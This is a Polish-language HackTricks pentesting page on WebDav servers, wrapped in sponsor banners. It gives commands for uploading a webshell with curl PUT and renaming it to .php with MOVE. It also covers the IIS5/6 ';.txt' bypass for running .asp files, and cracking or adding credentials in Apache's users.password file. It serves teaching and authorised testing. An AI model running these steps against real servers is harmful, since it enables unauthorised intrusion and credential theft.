# WebDav
\ Użyj [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) do łatwego tworzenia i **automatyzacji prac** przy użyciu najbardziej zaawansowanych narzędzi społecznościowych na świecie.\ Otrzymaj dostęp już dziś: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Zacznij od zera i zostań mistrzem hakowania AWS z htARTE (HackTricks AWS Red Team Expert)! Inne sposoby wsparcia HackTricks: * Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)! * Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com) * Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family) * **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Podczas pracy z **serwerem HTTP z włączonym WebDav**, możliwe jest **manipulowanie plikami**, jeśli masz odpowiednie **poświadczenia**, zazwyczaj weryfikowane za pomocą **HTTP Basic Authentication**. Przejęcie kontroli nad takim serwerem często wiąże się z **wgrywaniem i uruchamianiem webshell**. Dostęp do serwera WebDav zazwyczaj wymaga **ważnych poświadczeń**, a [**bruteforce WebDav**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) jest powszechną metodą ich pozyskania. Aby przezwyciężyć ograniczenia dotyczące wgrywania plików, zwłaszcza te uniemożliwiające wykonanie skryptów po stronie serwera, możesz: * **Wgrać** pliki z **rozszerzeniami wykonywalnymi** bezpośrednio, jeśli nie są ograniczone. * **Zmienić nazwę** wgranych plików niebędących wykonywalnymi (np. .txt) na rozszerzenie wykonywalne. * **Skopiować** wgrane pliki niebędące wykonywalnymi, zmieniając ich rozszerzenie na takie, które jest wykonywalne. ## DavTest **Davtest** próbuje **wgrać kilka plików z różnymi rozszerzeniami** i **sprawdza**, czy rozszerzenie jest **wykonywane**: ```bash davtest [-auth user:password] -move -sendbd auto -url http:// #Uplaod .txt files and try to move it to other extensions davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every extension ``` ## Cadaver Możesz użyć tego narzędzia do **połączenia z serwerem WebDav** i wykonywania działań (takich jak **przesyłanie**, **przenoszenie** lub **usuwanie**) **ręcznie**. ``` cadaver ``` ## Zapytanie PUT ``` curl -T 'shell.txt' 'http://$ip' ``` ## Żądanie MOVE ``` curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt' ```
\ Użyj [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks), aby łatwo tworzyć i **automatyzować** zadania przy użyciu najbardziej zaawansowanych narzędzi społeczności.\ Otrzymaj dostęp już dziś: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## Podatność WebDav w IIS5/6 Ta podatność jest bardzo interesująca. **WebDav** **nie pozwala** na **przesyłanie** ani **zmianę nazwy** plików z rozszerzeniem **.asp**. Jednak można to **obejść**, dodając na końcu nazwy **";.txt"**, a plik zostanie **wykonany** jak plik .asp (można również **użyć ".html" zamiast ".txt"**, ale **NIE zapomnij o ";"**). Następnie możesz **przesłać** swoją powłokę jako plik ".**txt"** i **skopiować/przenieść go do pliku ".asp;.txt"**. Po dostępie do tego pliku przez serwer WWW, zostanie **wykonany** (cadaver powie, że akcja przeniesienia nie powiodła się, ale tak naprawdę się udała). ![](<../../.gitbook/assets/image (1089).png>) ## Dane uwierzytelniające po Jeśli Webdav korzystał z serwera Apache, powinieneś sprawdzić skonfigurowane witryny w Apache. Zazwyczaj:\ _**/etc/apache2/sites-enabled/000-default**_ Wewnątrz możesz znaleźć coś takiego: ``` ServerAdmin webmaster@localhost Alias /webdav /var/www/webdav DAV On AuthType Digest AuthName "webdav" AuthUserFile /etc/apache2/users.password Require valid-user ``` Jak widać, są pliki z prawidłowymi **dane uwierzytelniające** do serwera **webdav**: ``` /etc/apache2/users.password ``` Wewnątrz tego typu plików znajdziesz **nazwę użytkownika** i **hash** hasła. Są to dane uwierzytelniające, których serwer WebDAV używa do uwierzytelniania użytkowników. Możesz spróbować je **złamać**, lub **dodać więcej**, jeśli z jakiegoś powodu chcesz **uzyskać dostęp** do serwera **WebDAV**: ```bash htpasswd /etc/apache2/users.password #You will be prompted for the password ``` Aby sprawdzić, czy nowe dane uwierzytelniające działają, możesz wykonać: ```bash wget --user --ask-password http://domain/path/to/webdav/ -O - -q ``` ## Odnośniki * [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)! Inne sposoby wsparcia HackTricks: * Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)! * Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com) * Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family) * **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
\ Użyj [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks), aby łatwo tworzyć i **automatyzować przepływy pracy** zasilane przez **najbardziej zaawansowane** narzędzia społecznościowe na świecie.\ Otrzymaj dostęp już dziś: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}